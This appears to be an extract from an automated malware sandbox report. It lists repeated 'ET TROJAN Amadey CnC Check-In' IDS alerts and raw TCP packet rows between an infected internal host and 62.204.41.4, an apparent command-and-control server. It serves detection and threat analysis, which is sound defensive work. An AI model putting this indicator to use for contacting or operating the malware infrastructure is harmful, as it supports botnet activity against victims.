                                                                      192.168.2.762.204.41.450003802027700 02/07/23-23:08:25.325125TCP2027700ET TROJAN Amadey CnC Check-In5000380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450174802027700 02/07/23-23:09:11.713080TCP2027700ET TROJAN Amadey CnC Check-In5017480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449711802027700 02/07/23-23:07:05.695210TCP2027700ET TROJAN Amadey CnC Check-In4971180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450190802027700 02/07/23-23:09:15.591790TCP2027700ET TROJAN Amadey CnC Check-In5019080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450404802027700 02/07/23-23:10:10.231347TCP2027700ET TROJAN Amadey CnC Check-In5040480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449965802027700 02/07/23-23:08:13.650116TCP2027700ET TROJAN Amadey CnC Check-In4996580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450293802027700 02/07/23-23:09:43.101385TCP2027700ET TROJAN Amadey CnC Check-In5029380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450211802027700 02/07/23-23:09:20.794111TCP2027700ET TROJAN Amadey CnC Check-In5021180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449784802027700 02/07/23-23:07:24.915414TCP2027700ET TROJAN Amadey CnC Check-In4978480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450437802027700 02/07/23-23:10:20.219041TCP2027700ET TROJAN Amadey CnC Check-In5043780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450460802027700 02/07/23-23:10:25.826616TCP2027700ET TROJAN Amadey CnC Check-In5046080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449859802027700 02/07/23-23:07:44.659899TCP2027700ET TROJAN Amadey CnC Check-In4985980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450187802027700 02/07/23-23:09:14.862061TCP2027700ET TROJAN Amadey CnC Check-In5018780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450105802027700 02/07/23-23:08:52.555967TCP2027700ET TROJAN Amadey CnC Check-In5010580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450302802027700 02/07/23-23:09:45.325485TCP2027700ET TROJAN Amadey CnC Check-In5030280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450229802027700 02/07/23-23:09:25.211609TCP2027700ET TROJAN Amadey CnC Check-In5022980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449890802027700 02/07/23-23:07:52.300017TCP2027700ET TROJAN Amadey CnC Check-In4989080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450141802027700 02/07/23-23:09:01.548249TCP2027700ET TROJAN Amadey CnC Check-In5014180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450395802027700 02/07/23-23:10:08.061097TCP2027700ET TROJAN Amadey CnC Check-In5039580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450224802027700 02/07/23-23:09:23.949840TCP2027700ET TROJAN Amadey CnC Check-In5022480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449771802027700 02/07/23-23:07:21.708262TCP2027700ET TROJAN Amadey CnC Check-In4977180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449895802027700 02/07/23-23:07:53.534084TCP2027700ET TROJAN Amadey CnC Check-In4989580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449813802027700 02/07/23-23:07:31.831966TCP2027700ET TROJAN Amadey CnC Check-In4981380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450194802027700 02/07/23-23:09:16.621524TCP2027700ET TROJAN Amadey CnC Check-In5019480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450292802027700 02/07/23-23:09:42.847678TCP2027700ET TROJAN Amadey CnC Check-In5029280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449903802027700 02/07/23-23:07:56.006891TCP2027700ET TROJAN Amadey CnC Check-In4990380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450424802027700 02/07/23-23:10:15.140263TCP2027700ET TROJAN Amadey CnC Check-In5042480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449814802027700 02/07/23-23:07:32.080927TCP2027700ET TROJAN Amadey CnC Check-In4981480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450289802027700 02/07/23-23:09:42.121099TCP2027700ET TROJAN Amadey CnC Check-In5028980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450035802027700 02/07/23-23:08:33.151525TCP2027700ET TROJAN Amadey CnC Check-In5003580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450068802027700 02/07/23-23:08:43.057010TCP2027700ET TROJAN Amadey CnC Check-In5006880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449912802027700 02/07/23-23:08:00.559985TCP2027700ET TROJAN Amadey CnC Check-In4991280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450010802027700 02/07/23-23:08:27.035129TCP2027700ET TROJAN Amadey CnC Check-In5001080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450362802027700 02/07/23-23:10:00.086376TCP2027700ET TROJAN Amadey CnC Check-In5036280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449909802027700 02/07/23-23:07:59.832613TCP2027700ET TROJAN Amadey CnC Check-In4990980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450335802027700 02/07/23-23:09:53.466997TCP2027700ET TROJAN Amadey CnC Check-In5033580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449899802027700 02/07/23-23:07:54.525689TCP2027700ET TROJAN Amadey CnC Check-In4989980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449997802027700 02/07/23-23:08:23.882401TCP2027700ET TROJAN Amadey CnC Check-In4999780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449870802027700 02/07/23-23:07:47.398418TCP2027700ET TROJAN Amadey CnC Check-In4987080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450273802027700 02/07/23-23:09:38.220730TCP2027700ET TROJAN Amadey CnC Check-In5027380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449833802027700 02/07/23-23:07:36.871624TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450049802027700 02/07/23-23:08:38.401506TCP2027700ET TROJAN Amadey CnC Check-In5004980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449998802027700 02/07/23-23:08:24.116921TCP2027700ET TROJAN Amadey CnC Check-In4999880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450138802027700 02/07/23-23:09:00.761131TCP2027700ET TROJAN Amadey CnC Check-In5013880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450204802027700 02/07/23-23:09:19.062253TCP2027700ET TROJAN Amadey CnC Check-In5020480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449839802027700 02/07/23-23:07:39.819277TCP2027700ET TROJAN Amadey CnC Check-In4983980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449928802027700 02/07/23-23:08:04.507544TCP2027700ET TROJAN Amadey CnC Check-In4992880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450405802027700 02/07/23-23:10:10.475956TCP2027700ET TROJAN Amadey CnC Check-In5040580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449715802027700 02/07/23-23:07:06.670721TCP2027700ET TROJAN Amadey CnC Check-In4971580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450306802027700 02/07/23-23:09:46.316046TCP2027700ET TROJAN Amadey CnC Check-In5030680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449791802027700 02/07/23-23:07:26.598224TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450220802027700 02/07/23-23:09:22.982035TCP2027700ET TROJAN Amadey CnC Check-In5022080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450223802027700 02/07/23-23:09:23.700905TCP2027700ET TROJAN Amadey CnC Check-In5022380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450477802027700 02/07/23-23:10:29.999028TCP2027700ET TROJAN Amadey CnC Check-In5047780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450125802027700 02/07/23-23:08:57.600771TCP2027700ET TROJAN Amadey CnC Check-In5012580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450217802027700 02/07/23-23:09:22.244329TCP2027700ET TROJAN Amadey CnC Check-In5021780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450036802027700 02/07/23-23:08:33.388754TCP2027700ET TROJAN Amadey CnC Check-In5003680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450134802027700 02/07/23-23:08:59.789777TCP2027700ET TROJAN Amadey CnC Check-In5013480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450388802027700 02/07/23-23:10:06.372796TCP2027700ET TROJAN Amadey CnC Check-In5038880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450391802027700 02/07/23-23:10:07.091832TCP2027700ET TROJAN Amadey CnC Check-In5039180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450474802027700 02/07/23-23:10:29.268969TCP2027700ET TROJAN Amadey CnC Check-In5047480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450181802027700 02/07/23-23:09:13.403025TCP2027700ET TROJAN Amadey CnC Check-In5018180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450408802027700 02/07/23-23:10:11.262817TCP2027700ET TROJAN Amadey CnC Check-In5040880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449925802027700 02/07/23-23:08:03.782317TCP2027700ET TROJAN Amadey CnC Check-In4992580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450092802027700 02/07/23-23:08:49.011979TCP2027700ET TROJAN Amadey CnC Check-In5009280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450319802027700 02/07/23-23:09:49.495652TCP2027700ET TROJAN Amadey CnC Check-In5031980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449801802027700 02/07/23-23:07:28.990558TCP2027700ET TROJAN Amadey CnC Check-In4980180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450461802027700 02/07/23-23:10:26.066420TCP2027700ET TROJAN Amadey CnC Check-In5046180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449972802027700 02/07/23-23:08:16.388087TCP2027700ET TROJAN Amadey CnC Check-In4997280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450236802027700 02/07/23-23:09:27.474416TCP2027700ET TROJAN Amadey CnC Check-In5023680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450023802027700 02/07/23-23:08:30.249609TCP2027700ET TROJAN Amadey CnC Check-In5002380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450147802027700 02/07/23-23:09:03.026189TCP2027700ET TROJAN Amadey CnC Check-In5014780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449883802027700 02/07/23-23:07:50.617719TCP2027700ET TROJAN Amadey CnC Check-In4988380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450421802027700 02/07/23-23:10:14.406004TCP2027700ET TROJAN Amadey CnC Check-In5042180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449863802027700 02/07/23-23:07:45.653673TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450286802027700 02/07/23-23:09:41.402786TCP2027700ET TROJAN Amadey CnC Check-In5028680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450029802027700 02/07/23-23:08:31.679572TCP2027700ET TROJAN Amadey CnC Check-In5002980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449820802027700 02/07/23-23:07:33.547735TCP2027700ET TROJAN Amadey CnC Check-In4982080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449958802027700 02/07/23-23:08:11.883807TCP2027700ET TROJAN Amadey CnC Check-In4995880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450102802027700 02/07/23-23:08:51.747853TCP2027700ET TROJAN Amadey CnC Check-In5010280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449817802027700 02/07/23-23:07:32.798708TCP2027700ET TROJAN Amadey CnC Check-In4981780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450243802027700 02/07/23-23:09:30.844574TCP2027700ET TROJAN Amadey CnC Check-In5024380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450338802027700 02/07/23-23:09:54.241583TCP2027700ET TROJAN Amadey CnC Check-In5033880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450065802027700 02/07/23-23:08:42.321938TCP2027700ET TROJAN Amadey CnC Check-In5006580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450411802027700 02/07/23-23:10:11.977609TCP2027700ET TROJAN Amadey CnC Check-In5041180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450019802027700 02/07/23-23:08:29.231063TCP2027700ET TROJAN Amadey CnC Check-In5001980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450464802027700 02/07/23-23:10:26.781066TCP2027700ET TROJAN Amadey CnC Check-In5046480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449886802027700 02/07/23-23:07:51.330001TCP2027700ET TROJAN Amadey CnC Check-In4988680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450055802027700 02/07/23-23:08:39.857527TCP2027700ET TROJAN Amadey CnC Check-In5005580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450233802027700 02/07/23-23:09:26.208391TCP2027700ET TROJAN Amadey CnC Check-In5023380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449935802027700 02/07/23-23:08:06.241910TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450171802027700 02/07/23-23:09:10.958890TCP2027700ET TROJAN Amadey CnC Check-In5017180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450441802027700 02/07/23-23:10:21.186453TCP2027700ET TROJAN Amadey CnC Check-In5044180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450085802027700 02/07/23-23:08:47.307738TCP2027700ET TROJAN Amadey CnC Check-In5008580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449843802027700 02/07/23-23:07:40.769584TCP2027700ET TROJAN Amadey CnC Check-In4984380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450263802027700 02/07/23-23:09:35.762539TCP2027700ET TROJAN Amadey CnC Check-In5026380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449757802027700 02/07/23-23:07:16.570116TCP2027700ET TROJAN Amadey CnC Check-In4975780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449876802027700 02/07/23-23:07:48.864985TCP2027700ET TROJAN Amadey CnC Check-In4987680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449873802027700 02/07/23-23:07:48.143493TCP2027700ET TROJAN Amadey CnC Check-In4987380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449702802027700 02/07/23-23:07:03.497685TCP2027700ET TROJAN Amadey CnC Check-In4970280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449948802027700 02/07/23-23:08:09.418495TCP2027700ET TROJAN Amadey CnC Check-In4994880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449698802027700 02/07/23-23:07:02.520211TCP2027700ET TROJAN Amadey CnC Check-In4969880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450098802027700 02/07/23-23:08:50.686542TCP2027700ET TROJAN Amadey CnC Check-In5009880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449830802027700 02/07/23-23:07:35.970669TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450016802027700 02/07/23-23:08:28.501580TCP2027700ET TROJAN Amadey CnC Check-In5001680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450454802027700 02/07/23-23:10:24.351476TCP2027700ET TROJAN Amadey CnC Check-In5045480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450207802027700 02/07/23-23:09:19.807802TCP2027700ET TROJAN Amadey CnC Check-In5020780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450276802027700 02/07/23-23:09:38.947586TCP2027700ET TROJAN Amadey CnC Check-In5027680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450467802027700 02/07/23-23:10:27.519527TCP2027700ET TROJAN Amadey CnC Check-In5046780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450230802027700 02/07/23-23:09:25.448061TCP2027700ET TROJAN Amadey CnC Check-In5023080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449807802027700 02/07/23-23:07:30.407498TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449978802027700 02/07/23-23:08:19.152480TCP2027700ET TROJAN Amadey CnC Check-In4997880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450052802027700 02/07/23-23:08:39.150060TCP2027700ET TROJAN Amadey CnC Check-In5005280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450348802027700 02/07/23-23:09:56.686065TCP2027700ET TROJAN Amadey CnC Check-In5034880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449866802027700 02/07/23-23:07:46.384765TCP2027700ET TROJAN Amadey CnC Check-In4986680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449860802027700 02/07/23-23:07:44.917311TCP2027700ET TROJAN Amadey CnC Check-In4986080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449777802027700 02/07/23-23:07:23.237313TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449955802027700 02/07/23-23:08:11.133835TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450240802027700 02/07/23-23:09:30.031560TCP2027700ET TROJAN Amadey CnC Check-In5024080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450151802027700 02/07/23-23:09:04.039199TCP2027700ET TROJAN Amadey CnC Check-In5015180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450062802027700 02/07/23-23:08:41.588091TCP2027700ET TROJAN Amadey CnC Check-In5006280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449850802027700 02/07/23-23:07:42.466685TCP2027700ET TROJAN Amadey CnC Check-In4985080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450279802027700 02/07/23-23:09:39.671696TCP2027700ET TROJAN Amadey CnC Check-In5027980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449945802027700 02/07/23-23:08:08.700275TCP2027700ET TROJAN Amadey CnC Check-In4994580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450434802027700 02/07/23-23:10:19.489029TCP2027700ET TROJAN Amadey CnC Check-In5043480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450345802027700 02/07/23-23:09:55.938392TCP2027700ET TROJAN Amadey CnC Check-In5034580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449767802027700 02/07/23-23:07:19.936780TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450368802027700 02/07/23-23:10:01.561612TCP2027700ET TROJAN Amadey CnC Check-In5036880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450250802027700 02/07/23-23:09:32.516213TCP2027700ET TROJAN Amadey CnC Check-In5025080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450457802027700 02/07/23-23:10:25.069012TCP2027700ET TROJAN Amadey CnC Check-In5045780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449856802027700 02/07/23-23:07:43.927943TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450161802027700 02/07/23-23:09:06.445124TCP2027700ET TROJAN Amadey CnC Check-In5016180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450072802027700 02/07/23-23:08:44.049738TCP2027700ET TROJAN Amadey CnC Check-In5007280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450167802027700 02/07/23-23:09:08.918959TCP2027700ET TROJAN Amadey CnC Check-In5016780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450256802027700 02/07/23-23:09:34.024543TCP2027700ET TROJAN Amadey CnC Check-In5025680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450078802027700 02/07/23-23:08:45.546416TCP2027700ET TROJAN Amadey CnC Check-In5007880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450266802027700 02/07/23-23:09:36.481027TCP2027700ET TROJAN Amadey CnC Check-In5026680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450355802027700 02/07/23-23:09:58.376240TCP2027700ET TROJAN Amadey CnC Check-In5035580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450269802027700 02/07/23-23:09:37.221380TCP2027700ET TROJAN Amadey CnC Check-In5026980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450006802027700 02/07/23-23:08:26.061962TCP2027700ET TROJAN Amadey CnC Check-In5000680192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450358802027700 02/07/23-23:09:59.107326TCP2027700ET TROJAN Amadey CnC Check-In5035880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450447802027700 02/07/23-23:10:22.643400TCP2027700ET TROJAN Amadey CnC Check-In5044780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449840802027700 02/07/23-23:07:40.053784TCP2027700ET TROJAN Amadey CnC Check-In4984080192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450177802027700 02/07/23-23:09:12.432080TCP2027700ET TROJAN Amadey CnC Check-In5017780192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449751802027700 02/07/23-23:07:15.127198TCP2027700ET TROJAN Amadey CnC Check-In4975180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450444802027700 02/07/23-23:10:21.912071TCP2027700ET TROJAN Amadey CnC Check-In5044480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449708802027700 02/07/23-23:07:04.970651TCP2027700ET TROJAN Amadey CnC Check-In4970880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450088802027700 02/07/23-23:08:48.057973TCP2027700ET TROJAN Amadey CnC Check-In5008880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449968802027700 02/07/23-23:08:14.393779TCP2027700ET TROJAN Amadey CnC Check-In4996880192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449761802027700 02/07/23-23:07:17.550184TCP2027700ET TROJAN Amadey CnC Check-In4976180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450009802027700 02/07/23-23:08:26.787937TCP2027700ET TROJAN Amadey CnC Check-In5000980192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450342802027700 02/07/23-23:09:55.215790TCP2027700ET TROJAN Amadey CnC Check-In5034280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449942802027700 02/07/23-23:08:07.961390TCP2027700ET TROJAN Amadey CnC Check-In4994280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449853802027700 02/07/23-23:07:43.194714TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449764802027700 02/07/23-23:07:18.587959TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450253802027700 02/07/23-23:09:33.281756TCP2027700ET TROJAN Amadey CnC Check-In5025380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450431802027700 02/07/23-23:10:18.720532TCP2027700ET TROJAN Amadey CnC Check-In5043180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450075802027700 02/07/23-23:08:44.816817TCP2027700ET TROJAN Amadey CnC Check-In5007580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450164802027700 02/07/23-23:09:07.186122TCP2027700ET TROJAN Amadey CnC Check-In5016480192.168.2.762.204.41.4
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Feb 7, 2023 23:07:00.461663008 CET4969480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:00.462452888 CET4969580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:00.521253109 CET804969462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:00.523772001 CET804969562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:00.523967028 CET4969580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:00.523969889 CET4969480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:00.567050934 CET4969480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:00.567383051 CET4969580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:00.626472950 CET804969462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:00.628007889 CET804969562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:00.628043890 CET804969562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:00.628181934 CET4969580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:00.630398035 CET804969462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:00.633327007 CET4969480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.257010937 CET4969480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.257169008 CET4969580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.257797956 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.269526958 CET4969780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.316663980 CET804969462.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.316807032 CET4969480192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.317754030 CET804969562.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.317861080 CET4969580192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.320179939 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.320318937 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.332140923 CET804969762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.332343102 CET4969780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.356877089 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.357866049 CET4969780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.419548988 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.419603109 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.419640064 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.419676065 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.419684887 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.419708967 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.419709921 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.419723034 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.419744015 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.419749975 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.419779062 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.419784069 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.419814110 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.419821024 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.419850111 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.419852972 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.419883013 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.419889927 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.419918060 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.419941902 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.419959068 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.420213938 CET804969762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.422851086 CET804969762.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.423002005 CET4969780192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.482530117 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.482631922 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.482714891 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.482717991 CET804969662.204.41.4192.168.2.7
                                                                      Feb 7, 2023 23:07:01.482748032 CET4969680192.168.2.762.204.41.4
                                                                      Feb 7, 2023 23:07:01.482784033 CET4969680192.168.2.762.204.41.4
